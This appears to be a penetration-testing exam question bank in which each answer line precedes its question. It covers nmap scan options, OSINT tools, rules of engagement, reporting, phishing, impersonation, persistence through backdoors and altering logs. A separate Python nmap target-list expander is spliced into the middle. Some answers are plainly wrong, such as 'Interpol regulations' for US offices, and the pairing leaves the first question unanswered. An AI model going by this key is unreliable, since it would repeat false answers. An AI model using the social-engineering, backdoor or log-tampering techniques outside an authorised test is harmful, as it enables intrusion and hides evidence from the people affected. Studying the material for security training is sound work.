You are a penetration tester, and you want to capture NTLM v2 hashes over the wire for use in a pass-the-hash attack. Which tool does not allow you to capture NTLM v2 hashes over the wire?
Impacket
You are a penetration tester, and you want to capture user hashes on a Windows network. You want to gather broadcast messages and have the ability to authenticate with hashes once you have captured them. What tool should you use?
Censys
You are a penetration tester, and you want to do a search to see your client's computers and devices that are connected to the Internet and that will show you the geoIP information, if available. Which tool can you use to accomplish this?
Shodan
You are a penetration tester, and you want to do a search to see your client's computers and devices that are connected to the Internet by using a variety of filters. Which tool can you use to accomplish this?
Red team assessments
You are a penetration tester. You are looking at the type of penetration test that is not meant to identify as many vulnerabilities as possible but instead concentrates on the vulnerabilities that specifically align with the goals of gaining control of specific systems or data. What type of assessment are you looking at running?
Any additional rates
You are a penetration tester, and you are discussing performing compliance-based assessments for a client. Which is an important key consideration?
Include all the technical detail pertaining to the testing.
You are a security analyst, and you have just completed a penetration test. What item would not be appropriate when writing an executive summary?
Ask a member of senior management to sign a document granting you permission to perform the test.
You are arranging the terms of a penetration test with a new client. Which of the following is an appropriate way to secure legal permission to conduct the test?
Interpol regulations
You are asked to perform a penetration test for an organization with offices located in New York City, Los Angeles, and Fargo. Which cybersecurity laws and regulations do you need to check as you scope the assessment?
Grey box
You are negotiating an upcoming penetration test with a new client. They have requested that you perform a "partial knowledge" test of their network. Which type of penetration test should you perform?
Map vulnerabilities present in the older Linux servers to possible exploits.
You are assessing the results of a vulnerability scan and have made an observation. You have found that the organization has many Linux servers deployed that still run on a distribution that was released in 2008. What should you do?
Investigate whether this creates any vulnerabilities that you could exploit; document the common theme of missing updates in the final penetration test report
You are assessing the results of a vulnerability scan and have noticed a common theme. You have found that almost all of the target organization's Windows Server 2012 R2 systems are missing the same critical security updates. What should you do? (Choose two.)
Recommend that the client adopt a best practice of changing all default usernames and passwords; exploit the devices that are using default usernames and passwords
You are assessing the results of a vulnerability scan and notice that many network devices, such as routers and access points, still use default administrative usernames and passwords. This information can be easily found on the Internet and represents a significant security vulnerability. What should you do? (Choose two.)
Goal reprioritization
You are conducting a PCI DSS penetration test for a client. During the testing process, a dangerous ransomware exploit begins to spread between networks around the world. The client asks you to halt the PCI DSS penetration test and instead test to see whether their network is vulnerable to this new type of malware. Which term best describes what happened in this scenario?
Stages
You are conducting a black box penetration test for a client. The enumeration phase of the test is complete, and you are ready to begin exploiting vulnerable systems. Before doing so, you communicate with the client and inform them that the test is transitioning. Which type of communication trigger was used in this scenario?
Stages
You are conducting a black box penetration test for a client. The reconnaissance phase of the test is complete, and you are ready to move on to the next phase. Before doing so, you communicate with the client and inform them that the test is moving from one phase to another. Which type of communication trigger was used in this scenario?
Stages
You are conducting a black box penetration test for a client. The test is now complete, and you are ready to begin cleaning up after yourself. Before doing so, you communicate with the client and inform them that the test is complete and to be aware that cleanup activities will be occurring. Which type of communication trigger was used in this scenario?
Phishing
You are conducting a black box penetration test for a client. You have used reconnaissance tools to create a list of employee email addresses within the target organization. You craft an email addressed to all of the employees warning them that they must change their password within 24 hours or they will lose access. When they click the link provided in the email, they are redirected to your own website where their credentials are captured to a text file. What kind of exploit did you use?
Critical findings
You are conducting a black box penetration test for a small financial institution. Using pretexting, you are able to gain access to the target facility by posing as a copier repair person. As you walk through the building, you notice that almost all employees have written their (overly complex) passwords on sticky notes and posted them on their computer monitors and keyboards. Some are so obvious that they can be seen by keen-eyed customers. This represents a tempting target for you to exploit; however, you recognize the immediate risk associated with this practice. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that credentials are plainly visible. Which type of communication trigger was used in this scenario?
You are attacking wireless networks that are out of scope.
You are conducting a black box penetration test for a client. The client leases its office space in a building shared with other tenants. You are sitting in your car in a parking lot in front of the client's offices scanning for wireless network signals emanating from the building. You have identified five separate SSIDs. You don't know which one belongs to your client, so you decide to clandestinely connect to all of them and then run some simple scans to isolate which one is your client's wireless network. What did you do incorrectly in this scenario?
Critical findings
You are conducting a gray box penetration test for a client. During the test, you discover that help desk technicians are using authenticated but unencrypted FTP connections over the Internet to transfer files to computers located at remote branch-office sites. As such, their credentials are potentially being exposed on the public network. Even though this represents a tempting target for you to exploit, you recognize the immediate risk associated with this practice. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that privileged credentials are potentially being exposed on the Internet. Which type of communication trigger was used in this scenario?
Critical findings
You are conducting a gray box penetration test for a client. During the test, you discover that many users' Windows desktop systems haven't been patched properly and are still vulnerable to several common types of ransomware. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that their systems are vulnerable. Which type of communication trigger was used in this scenario?
Goal reprioritization
You are conducting a gray box penetration test for a client. During the testing process, you notice that their wireless network uses weak encryption with a preshared key (00000001) that is easy to brute-force crack. Further, you notice that the client has implemented omnidirectional access points throughout the facility. You suspect that the wireless signal is emanating far outside the building. You contact the client and recommend that the test be modified to include testing of the Wi-Fi network from a black box perspective. Which term best describes what happened in this scenario?
nmap 192.168.1.1 -A
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to determine the operating system running on this host. Which command could you use to do this?
Black box
You are negotiating an upcoming penetration test with a new client. They have requested that you perform a "zero knowledge" test of their network. Which type of penetration test should you perform?
nmap 192.168.1.1 -O
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to determine the operating system running on this host. Which command should you use to do this?
nmap 192.168.1.1 -sS
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a SYN port scan of this host. Which command should you use to do this?
nmap 192.168.1.1 -sS; nmap 192.168.1.1
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a SYN port scan of this host. Which commands could you use to do this? (Choose two.)
nmap 192.168.1.1 -sA
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP ACK scan of this host. Which command should you use to do this?
nmap 192.168.1.1 -sT
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP connect scan of this host. Which command should you use to do this?
nmap 192.168.1.1 -sU
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a UDP port scan of this host. Which command should you use to do this?
nmap 192.168.1.1-254 -p 23
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all of the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) that have the Telnet port open. Which command should you use to do this?
nmap 192.168.1.1-254 -sn
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all of the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning any ports on those hosts. Which command should you use to do this?
nmap 192.168.1.0/24 -sL
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning those hosts. Which command should you use to do this?
nmap 192.168.1.10,11,13 -sA (a range such as 192.168.1.10-13 would also scan 192.168.1.12, which is not in scope)
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to run a TCP ACK scan of hosts on the network with IP addresses of 192.168.1.10, 192.168.1.11, and 192.168.1.13. Which command should you use to do this?
nmap 192.168.1.10 192.168.1.11 192.168.1.13 192.168.1.15 -sU
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to run a UDP scan of hosts on the network with IP addresses of 192.168.1.10, 192.168.1.11, 192.168.1.13, and 192.168.1.15. Which command should you use to do this?
nmap 192.168.1.2 -p-
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to scan all of the ports on a network host with an IP address of 192.168.1.2. Which command should you use to do this?
The Telnet service is not installed. The Telnet service is installed but not running.
You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Closed. What could this mean? (Choose two.)
The Telnet service is installed and running, but a host firewall is blocking it.
You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Filtered. What does this likely mean?
The Telnet service is installed, running, and accessible.
You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Open. What does this mean?
DNS poisoning
You are conducting a gray box penetration test. You want to capture C-level executives' authentication credentials. To accomplish this, you set up a fake internal web server that looks exactly like the web server used to manage employee time-off and reimbursement requests. You inject a fake DNS record into the organization's DNS server that redirects traffic from the real server to your fake server. What is this exploit called?
Compliance-based assessment
You are conducting a penetration test of an organization that processes credit cards. The client has asked that the scope of the test be based on the PCI-DSS standard. What type of assessment is occurring in this scenario?
Indicators of prior compromise
You are conducting a white box penetration test for a client. During the test, you discover a hidden backdoor administrator account on one of the client's Active Directory domain controllers. You check the logs of the domain controller and find that the backdoor account is being actively used on a daily basis. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that their server has been compromised. Which type of communication trigger was used in this scenario?
Indicators of prior compromise
You are conducting a white box penetration test for a client. During the test, you notice outgoing network traffic consistent with a distributed denial of service (DDoS) attack. You suspect that internal systems have been infected with malware, creating an amplifier network for the attack. Instead of waiting until the end of the test, you immediately communicate with the client to warn them. Which type of communication trigger was used in this scenario?
Indicators of prior compromise
You are conducting a white box penetration test for a client. During the test, you notice that all end-user workstations are configured with only the default Windows antivirus scanner. You further notice that many end users use an application to complete their daily work that is a known Trojan horse commonly used to create a botnet. Instead of waiting until the end of the test, you immediately communicate with the client to warn them. Which type of communication trigger was used in this scenario?
nmap 192.168.1.0/24 --exclude 192.168.1.250
You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0), but without scanning the host with an IP address of 192.168.1.250 (which you suspect is a honeypot host). Which command should you use to do this?
nmap 192.168.1.0/24 nmap 192.168.1.1-254
You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0). Which commands could you use to do this? (Choose two.)
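The nmap target forms used in the questions above (single address, CIDR, octet range, comma list inside an octet, several specs on one line, --exclude) expand to concrete address lists that are easy to get wrong. The following is an added example that is not part of the original question set and not nmap's own code: a small Python expander for those forms, run offline. It shows two things worth checking before a scan: that 192.168.1.10-13 includes 192.168.1.12 while 192.168.1.10,11,13 does not, and that nmap's 192.168.1.0/24 covers 256 addresses (network and broadcast included) whereas 192.168.1.1-254 covers 254.

```python
"""Expand nmap-style target specifications offline.

Added example, not from nmap or the exam material. Supports the forms the
questions use: a single address, CIDR (192.168.1.0/24), an octet range
(192.168.1.1-254), a comma list inside an octet (192.168.1.10,11,13),
several specs at once, and an exclude list (nmap --exclude).
"""
import ipaddress
from itertools import product
from typing import Iterable, List, Set


def _expand_octet(spec: str) -> List[int]:
    """'10,11,13-15' -> [10, 11, 13, 14, 15]; '*' -> 0..255."""
    if spec == "*":
        return list(range(256))
    values: List[int] = []
    for part in spec.split(","):
        if "-" in part:
            lo, hi = part.split("-", 1)
            lo_i = int(lo) if lo else 0      # nmap treats '-5' as 0-5
            hi_i = int(hi) if hi else 255    # and '250-' as 250-255
            values.extend(range(lo_i, hi_i + 1))
        else:
            values.append(int(part))
    for v in values:
        if not 0 <= v <= 255:
            raise ValueError(f"octet out of range in {spec!r}")
    return values


def expand_target(spec: str) -> List[str]:
    """Expand one target spec into dotted-quad strings, in nmap's order."""
    if "/" in spec:
        # nmap includes the network and broadcast addresses in a CIDR
        # expansion, so iterate the whole network, not .hosts()
        net = ipaddress.ip_network(spec, strict=False)
        return [str(addr) for addr in net]
    octets = spec.split(".")
    if len(octets) != 4:
        raise ValueError(f"unsupported target spec {spec!r}")
    ranges = [_expand_octet(o) for o in octets]
    return [".".join(map(str, combo)) for combo in product(*ranges)]


def expand_targets(specs: Iterable[str], exclude: Iterable[str] = ()) -> List[str]:
    """Expand several specs, drop excluded addresses, de-duplicate in order."""
    excluded: Set[str] = set()
    for spec in exclude:
        excluded.update(expand_target(spec))
    seen: Set[str] = set()
    out: List[str] = []
    for spec in specs:
        for addr in expand_target(spec):
            if addr in excluded or addr in seen:
                continue
            seen.add(addr)
            out.append(addr)
    return out


if __name__ == "__main__":
    print(expand_target("192.168.1.10-13"))      # four hosts, .12 included
    print(expand_target("192.168.1.10,11,13"))   # exactly the three listed
    print(len(expand_target("192.168.1.0/24")), len(expand_target("192.168.1.1-254")))
    scope = expand_targets(["192.168.1.0/24"], exclude=["192.168.1.250"])
    print(len(scope), "192.168.1.250" in scope)
```

Running the expander over the in-scope list before launching the real scan is a cheap way to confirm that an out-of-scope host (or a suspected honeypot) is not in the target set.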
Scope creep
You are conducting a white box penetration test. The scope of test specifies that the test will be conducted against the organization's switches, routers, and firewalls. As the assessment is nearing completion, the client asks you to use the time remaining to also test her email servers. What has occurred in this scenario?
Remove any tester-created credentials used during the test.
You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do?
Remove any tools or utilities you installed during the test.
You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do?
Remove any shell sessions created during the test. Document everything you do during the cleanup.
You are conducting the post-engagement cleanup process after a penetration test is complete. What should you do? (Choose two.)
The ROE should include written permission from senior management.
You are defining the rules of engagement (ROE) for an upcoming penetration test. During this process, you have defined off-limit times when you should not attack the target, a list of in-scope and out-of-scope systems, and data-handling requirements for the information you gather during the test. You also phoned one of the help-desk technicians at the target site and received verbal permission to conduct the test. You recorded the technician's name and the date in the ROE document. What did you do incorrectly in this scenario?
Having detailed information about the internal network invalidates the results of the test.
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a black box assessment. The client has specified that they do not want the test to be conducted during peak times of the day, so you added "timeout" time frames to the document when testing will be suspended. You have specified that no communications will occur between you and the client until the end of the test when you submit your final test results. You have also specified that the target must provide you with internal access to the network, a network map, and authentication credentials. What did you do incorrectly in this scenario?
You will have limited network access. You will have limited storage access.
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a gray box assessment. This will be an internal test. What limitations might you expect to encounter as you conduct the assessment? (Choose two.)
Active Directory users Password policies defined within Group Policy
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a white box assessment. This will be an internal test. No third parties may be involved. Which of the following resources could be considered in-scope for the assessment? (Choose two.)
The key management system they use to store encryption keys Their router configurations
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a white box assessment. This will be an internal test. No third parties may be involved. Which of the following resources could be considered in-scope for the assessment? (Choose two.)
Nothing. The ROE has been defined appropriately.
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a white box assessment. You have specified that the target may not employ shunning or blacklisting during the test. You have specified that the target must provide you with internal access to the network, a network map, and authentication credentials. You have also specified that applications provided by a SaaS service provider are off-limits during the test. What did you do incorrectly in this scenario?
The target organization The SaaS service provider
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a white box assessment. You have specified that the target may not employ shunning or blacklisting during the test. You have specified that the target must provide you with internal access to the network, a network map, and authentication credentials. You have also specified that applications provided by a SaaS service provider will be in-scope during the test. From whom do you need written authorization to perform this test? (Choose two.)
Clearly defined problem escalation procedures Acknowledgment that penetration testing carries inherent risks
You are defining the rules of engagement (ROE) for an upcoming penetration test. You are working on the problem resolution section of the document. Which elements should be included in this section? (Choose two.)
Wireless SSIDs used by the client IP address ranges used on the client's internal network
You are defining the scope of an upcoming penetration test. Your client's offices are located in a large office complex with many other tenants. The client has asked you to include the organization's network in the test. Which parameters should be identified as in-scope? (Choose two.)
Using smart cards and PINs
You are discussing multifactor authentication with a client. The client asks you for an example of what multifactor authentication is. What do you tell the client as to what would meet requirements of multifactor authentication?
How you will communicate the results of the test with the target A list of behaviors that are not allowed on the part of the target during the test
You are documenting the rules of engagement (ROE) for an upcoming penetration test. Which elements should be considered? (Choose two.)
A list of out-of-scope systems A list of in-scope systems
You are documenting the rules of engagement (ROE) for an upcoming penetration test. Which elements should you make sure to include? (Choose two.)
Conclusion
You are generating a written report of findings after a penetration test. Based on the results of the test, you have created a list of recommendations you feel the client should focus on. Where should you include your recommendations in the report?
Conclusion
You are generating a written report of findings after a penetration test. Based on the sheer number of vulnerabilities you discovered in the test, you feel that the client should undergo a follow-up penetration test within the next three months to verify that the issues have been remediated. Where should you include this recommendation in the report?
Findings and remediation
You are generating a written report of findings after a penetration test. During the test, you discovered that many older Windows workstations in the network haven't been patched properly and are susceptible to the WannaCry ransomware. To fix this, the client needs to install the MS17-010 - Critical update from Microsoft. Where should you include this recommendation in your report?
Findings and remediation
You are generating a written report of findings after a penetration test. During the test, you discovered that many older Windows workstations in the network haven't been patched properly and are susceptible to the WannaCry ransomware. Where should you include this information in your report?
Methodology
You are generating a written report of findings after a penetration test. During the test, you followed the NIST 800-115 standard. In which section of the report should you include this information?
Methodology
You are generating a written report of findings after a penetration test. During the test, you followed the specifications of the EC-Council for its Certified Ethical Hacker (CEH) certification. Where should this information be included in your report?
Findings and remediation
You are generating a written report of findings after a penetration test. In which section of the report should you consider the risk appetite of the client when deciding which information to include?
Executive summary
You are generating a written report of findings after a penetration test. In which section of the report should you provide the reader with a high-level synopsis of the test and the results?
Metrics and measures
You are generating a written report of findings after a penetration test. In which section should you report risk ratings?
Metrics and measures
You are generating a written report of findings after a penetration test. You cross-reference each vulnerability you found in the test against the Common Vulnerabilities and Exposures (CVE) database to assign it a qualitative risk rating of Low, Medium, High, or Critical. Where should these risk ratings be included in the report?
whois recon-ng
You are in the information gathering stage of a black box penetration test. Which tools could you use to footprint the target organization using OSINT? (Choose two.)
Job postings on the organization's website Résumés of current employees on LinkedIn
You are in the information gathering stage of a black box penetration test. You need to footprint the target organization by determining what type of network infrastructure they use. Which OSINT sources could potentially reveal this information? (Choose two.)
Should the test be conducted on-site or from an off-site location?
You are in the initial stages of scoping a gray box penetration test with a new client. What is a question you should ask to better define the project scope?
Risk acceptance
You are meeting with a new client to scope out the parameters of a future penetration test. During the course of the discussion, you ask the client if they are willing to accept the fact that a penetration test could cause service disruptions within their organization. The client responds affirmatively. What process has occurred in this scenario?
Client acceptance
You are meeting with your client after a penetration test is complete. At the conclusion of the meeting, you ask the client to agree in writing that you have fulfilled your responsibilities according to the contract you initially signed with the client. What is this process called?
Attestation of findings
You are meeting with your client after a penetration test is complete. During the meeting, you provide the client with detailed evidence related to the issues you discovered during the test. What is this process called?
Future technological changes could expose new vulnerabilities that are currently unknown.
You are negotiating an upcoming penetration test with a new client. In the agreement, you have included language that specifies that the results of the test are valid only at the point in time when the test was performed. Why is this language in the agreement?
The rules of engagement and the type of assessment used could preclude some vulnerabilities from being discovered.
You are negotiating an upcoming penetration test with a new client. In the agreement, you have included language that specifies that the scope and methodology requested by the client can impact the comprehensiveness of the test. Why is this language in the agreement?
White box
You are negotiating an upcoming penetration test with a new client. They have requested that you perform a "full knowledge" test of their network. Which type of penetration test should you perform?
From within the internal network From a location outside the organization's firewall
You are performing a PCI-DSS compliance penetration test for a client. With respect to network topology, how should you run your vulnerability scans during this test? (Choose two.)
Conduct a spear phishing exploit to trick an internal user into revealing his or her credentials.
You are performing a black box penetration test for a client. The rules of engagement call for you to perform a credentialed vulnerability scan, but you haven't been given administrative logon information. What could you do?
Restrict the vulnerability scan to just those protocols commonly used on web servers.
You are performing a black box penetration test for a client. The rules of engagement call for you to perform a vulnerability scan on the organization's many public-facing web servers. You have been allotted only a few hours in the test scope to perform the scans. What should you do?
Impersonation
You are performing a black box penetration test for a large financial organization. Using reconnaissance techniques, you have identified the vendor that services the vending machines within the organization's main headquarters. You dress in a similar uniform as the vendor's employees. You also purchase a hand truck and several cases of soda pop. The receptionist of the target organization allows you to enter and directs you to the break room. What kind of exploit did you use in this scenario?
Fingerprinting Organizations with Collected Archives (FOCA)
You are performing a black box penetration test for a large financial organization. You want to search the Internet for any documents associated with the organization (such as Microsoft Word or PowerPoint documents) and analyze each file's metadata for useful information. Which tool in your penetration testing toolkit could you use to do this?
Censys
You are performing a black box penetration test for a large organization that wholesales imported electronic devices in the United States. You need to probe the organization's web server IP address to see what information is associated with it, such as the version of SSL or TLS and the cipher suite that it uses. Which tool in your penetration testing toolkit could you use to do this?
Censys whois recon-ng Shodan
You are performing a black box penetration test for a large organization that wholesales imported electronic devices in the United States. You need to uncover any information you can find about the organization using open source intelligence (OSINT). Which tool in your penetration testing toolkit could you use to do this?
Impersonation Elicitation
You are performing a black box penetration test for a medium-sized manufacturing organization. Using reconnaissance and phishing techniques, you have compromised the password for an employee's email account. You use this account to question other employees in an attempt to gather sensitive information and documents. Which exploits did you use in this scenario? (Choose two.)
Impersonation Elicitation
You are performing a black box penetration test for a medium-sized manufacturing organization. Using reconnaissance techniques, you have identified the vendor that services the printers within the organization's headquarters. You dress in a similar uniform as that vendor's employees. You also purchase a toolkit containing tools commonly used by printer repair technicians. The receptionist of the target organization allows you to enter and directs you to a troublesome printer. While "working" on that printer, you chat with nearby employees to gather information. Which exploits did you use in this scenario? (Choose two.)
Shoulder surfing Impersonation
You are performing a black box penetration test for a medium-sized manufacturing organization. Using reconnaissance techniques, you have identified the vendor that services the printers within the organization's headquarters. You dress in a similar uniform as that vendor's employees. You also purchase a toolkit containing tools commonly used by printer repair technicians. The receptionist of the target organization allows you to enter and directs you to a troublesome printer. While "working" within the organization, you discretely watch employees as they type, trying to gather sensitive information. Which exploits did you use in this scenario? (Choose two.)
nslookup
You are performing a black box penetration test for a medium-sized organization that sells imported clothing through its online storefront. You need to discover which IP addresses are associated with the organization's domain. Which tool in your penetration testing toolkit should you use?
theHarvester
You are performing a black box penetration test for a medium-sized organization that sells imported clothing through its online storefront. You want to query search engines and other resources to discover email addresses, employee names, and other details about the target. Which tool in your penetration testing toolkit should you use?
Smishing
You are performing a black box penetration test for a medium-sized organization that sells imported clothing. You have used reconnaissance techniques to identify a key software developer. You send this employee a personalized text message containing a Bitly URL that points to your own website where you capture information to a text file. What kind of exploit did you use in this scenario?
whois
You are performing a black box penetration test for a medium-sized organization that sells imported motorcycles and ATVs through its online storefront. You need to discover who owns the organization's domain. Which tool in your penetration testing toolkit should you use?
Whaling
You are performing a black box penetration test for a medium-sized organization. You have used reconnaissance techniques to identify the CEO's email address as well as the email address belonging to a help desk employee. You craft an email to the CEO that appears to come from the help desk employee directing the CEO to reset her password. When she clicks the link provided in the email, she is redirected to your own website where her credentials are captured to a text file. What kind of exploit did you use?
Vishing
You are performing a black box penetration test for a small organization that wholesales imported electronic devices in the United States. You have used reconnaissance techniques to identify a receptionist's phone number as well as the organization's printer vendor. You call this receptionist, pretending to be a sales rep from the vendor. You ask the receptionist for information about their printers, workstations, operating systems, and so on, to learn more about the organization's network infrastructure. What kind of exploit did you use in this scenario?
Isolate the POS devices on their own subnet that doesn't have Internet connectivity. Upgrade the POS devices to a newer version.
You are performing a black box penetration test for a small retail chain. When you enumerate one of their retail locations, you discover that their point-of-sale (POS) systems are connected directly to the Internet. When you footprint them, they appear to be running Windows XP SP3. You visit one of their retail locations and notice that the POS systems are connected to the network using a wired connection and are attached to the counter with a cable lock. What should you recommend in your final report to the client? (Choose two.)
Deception Social engineering
You are performing a black box penetration test. After gaining access to the internal network and running a vulnerability scan, you've identified a target system and mapped its vulnerabilities to a specific exploit. However, to execute the exploit, you need physical access to an internal network jack. So, you tailgate your way into the facility, plug in your laptop, and run the exploit. What technique did you use in this scenario? (Choose two.)
The scanner generated a false positive.
You are performing a black box penetration test. You are adjudicating the results of a vulnerability scan. Upon further inspection, you discover that one of the most serious vulnerabilities identified on the target organization's web server by the scanner doesn't actually exist. Which of the following could explain what has happened?
Conduct a phishing exploit. Enumerate internal user accounts.
You are performing a black box penetration test. You have used theHarvester to enumerate a large number of user email addresses in the target organization. What could you do with this information? (Choose two.)
Use the -T2 option with the nmap command.
You are performing a black box penetration test. You need to run a vulnerability scan using nmap from an external network location outside the organization's firewall. The organization uses a low-bandwidth T1 line to connect to the Internet. How should you configure the scan?
Send deauth frames to deauthenticate wireless clients. Reconnect wireless clients to an access point with the same SSID as the target organization.
You are performing a black box penetration test. You want to perform an evil twin attack to capture wireless user data. Which of the following tasks would you need to complete? (Choose two.)
A domain controller is running on an older version of Window Server and is missing several critical security updates. A database server is vulnerable to the WannaCry exploit.
You are performing a gray box penetration test and have just finished running your vulnerability scans, categorizing the results, and adjudicating the data. Now you need to prioritize the vulnerabilities prior to moving to the next phase of the test. Which of the following would likely constitute the highest priority vulnerabilities to exploit? (Choose two.)
Debug the application's executable.
You are performing a gray box penetration test for a client. The employees in the target organization use an application that was developed in-house to complete their day-to-day work. It crashes frequently, and you suspect that it is based on poorly written or outdated code. You want to analyze the application's execution when run by a typical end user to see whether it contains weaknesses that can be exploited. What should you do?
Decompile the application's executable.
You are performing a gray box penetration test for a client. The employees in the target organization use an application that was developed in-house to complete their day-to-day work. It crashes frequently, and you suspect that it is based on poorly written or outdated code. You want to analyze the application's source code to see whether it contains weaknesses that can be exploited. However, the rules of engagement for the test do not allow access to the code. What should you do?
Decompilers cannot recover the original source: variable and function names, comments, and most type information are lost, so the output is compiler-style pseudocode, and some tools only disassemble to assembly-level code.
You are performing a gray box penetration test for a client. You want to target an in-house application that the organization's employees use daily. To identify weaknesses in the code, you decide to decompile the application's executable. You have some experience programming in C++, so you feel comfortable reviewing the source code revealed by the decompile process. However, after decompiling, you find that you don't understand the contents of the source code file produced. Why did this happen?
Spear phishing
You are performing a gray box penetration test for a medium-sized organization. You have used reconnaissance techniques to identify a help desk employee and a payroll employee. You craft an email to the payroll employee that appears to come from the help desk employee directing the payroll employee to reset her password. When she clicks the link provided in the email, she is redirected to your own website where her credentials are captured to a text file. What kind of exploit did you use?
CVE Full Disclosure NVD
You are performing a gray box penetration test. During the enumeration and fingerprinting process, you discovered that an internal website on the target organization's network runs on a very old version of IIS. You need to see whether there are any vulnerabilities associated with this older web server that you may be able exploit. Which open source research source could you use?
Switch spoofing
You are performing a gray box penetration test. To capture information from multiple VLANs, you have configured the network board in your computer to emulate a trunk port on a network switch. Your goal is to get the real switch to forward traffic from all VLANs to your device. What is this exploit called?
They can be fooled with fake fingerprints.
You are performing a gray box penetration test. While on-site, you notice that all employees use USB fingerprint biometric scanners to authenticate to their systems. What is the security weakness associated with this type of authentication system?
The IDS will detect the stealth scan.
You are performing a gray box penetration test. You are performing a vulnerability scan on the internal network using a stealth scan. The target network has an IDS device installed. What is likely to happen?
By operating system By asset value By number of vulnerabilities found By vulnerability severity
You are performing a gray box penetration test. You have just finished running extensive vulnerability scans on all of the hosts on the target network. You now need to categorize all of the devices that were scanned. Which of the following is a valid way to perform asset categorization?
Create a backdoor. Create a user account.
You are performing a gray box penetration test. You have successfully compromised a target computer system. What techniques could you employ to ensure persistence? (Choose two.)
Hide any files that you copied to the system. Alter log entries created when you compromised the system.
You are performing a gray box penetration test. You have successfully compromised a target computer system. You now need to cover your tracks to hide the evidence of your actions. Which techniques could you employ? (Choose two.)
Use the -T2 option with the nmap command.
You are performing a gray box penetration test. You need to run a vulnerability scan on a fragile internal server system. How should you configure the scan?
It is probably a web server.
You are performing a gray box penetration test. You run a vulnerability scan of a host and find that TCP ports 8080 and 8443 are open. What can you infer about this host from this information?
hping
You are performing a gray box penetration test. You want to craft a custom packet to test how a server responds and to see what information it responds with. Which utility could you use to do this?
telnet 10.0.0.1 80
You are performing a gray box penetration test. You want to use the Telnet client on your Linux laptop to grab the banner of a web server on the target's network. The target web server has an IP address of 10.0.0.1. Which command would you use at the shell prompt to do this?
The scanning host responds to the target host with an RST packet.
You are performing a vulnerability scan during a gray box penetration test. The scanner manipulates the TCP three-way handshake to enumerate network hosts. First, the scanner sends a SYN packet to the target host. The host responds with a SYN-ACK packet to the scanning host. What happens next?
Stealth
You are performing a vulnerability scan during a gray box penetration test. The scanner manipulates the TCP three-way handshake to enumerate network hosts. Which type of scan are you performing?
The client's network access control (NAC) system has quarantined your laptop on a remediation network.
You are performing a white box penetration test for a client. You arrive at the client's site and plug your laptop into an open network jack. However, your laptop receives only limited connectivity on the client's network. You run the ipconfig command and notice that your laptop has received an IP address, but you can see only one other host on the network. Why did this happen?
Elicitation
You are performing reconnaissance as a part of a black box penetration test. You notice that the employees of the target organization commonly congregate at a particular outdoor restaurant for lunch. You begin frequenting the same restaurant for lunch and make friends with several of the target organization's employees. After you gain their trust, they begin to share information about their jobs, computers, bosses, customers, projects, and so on. What type of exploit occurred in this scenario?
Likeness
You are performing reconnaissance as a part of a black box penetration test. You notice that the employees of the target organization commonly congregate at a particular outdoor restaurant for lunch. You hire several young, physically attractive consultants to help with the penetration test. You send them to the same restaurant for lunch and have them make friends with several of the target organization's employees. They gain the employees' trust, and the employees begin to share information about their jobs, computers, bosses, customers, projects, and so on. Which motivation factor was used in this scenario?
It is an FTP server.
You are performing reconnaissance as part of a black box penetration test. You run a vulnerability scan on one of the target organization's public-facing servers and discover that port 20 is open. What does this indicate?
It is an SMTP server.
You are performing reconnaissance as part of a black box penetration test. You run a vulnerability scan on one of the target organization's public-facing servers and discover that port 25 is open. What does this indicate?
It is an SMB file server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's internal servers and discover that port 445 is open. What does this indicate?
It is an IMAP email server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that port 143 is open. What does this indicate?
It is an SSH server.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization's servers and discover that port 22 is open. What does this indicate?
It is a Telnet server.
